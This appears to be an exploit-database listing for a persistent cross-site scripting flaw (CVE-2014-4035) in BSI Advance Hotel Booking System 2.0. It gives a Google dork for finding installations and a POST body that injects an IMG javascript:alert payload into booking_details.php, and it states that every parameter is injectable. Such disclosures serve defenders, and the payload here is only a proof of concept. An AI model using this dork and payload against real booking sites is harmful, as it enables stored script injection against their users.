BSI Advance Hotel Booking System 2.0 - (booking_details.php) Persistent Cross-Site Scripting Vulnera

🗓️ 13 Aug 2019 00:00:00Reported by Angelo RuwanthaType

zdt🔗 0day.today👁 63 Views

BSI Advance Hotel Booking System 2.0 - (booking_details.php) Persistent Cross-Site Scripting Vulnerabilit

Reporter	Title	Published	Views	Family All 9
CNVD	Best Soft Inc.(BSI) Advance Hotel Booking System Cross-Site Scripting Vulnerability	14 Aug 201900:00	–	cnvd
CVE	CVE-2014-4035	11 Jun 201414:00	–	cve
Cvelist	CVE-2014-4035	11 Jun 201414:00	–	cvelist
Exploit DB	BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting	12 Aug 201900:00	–	exploitdb
EUVD	EUVD-2014-3967	7 Oct 202500:30	–	euvd
exploitpack	BSI Advance Hotel Booking System 2.0 - booking_details.php Persistent Cross-Site Scripting	12 Aug 201900:00	–	exploitpack
NVD	CVE-2014-4035	11 Jun 201414:55	–	nvd
Packet Storm	BSI Advance Hotel Booking System 2.0 Cross Site Scripting	12 Aug 201900:00	–	packetstorm
Prion	Cross site scripting	11 Jun 201414:55	–	prion

# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035

Vulnerability
========================

[+]Method:POST

1.http://URL/hotel-booking/booking_details.php (;persistent XSS)

allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=


every parameter injectable :)

#  0day.today [2019-12-04]  #

13 Aug 2019 00:00Current

EPSS0.02855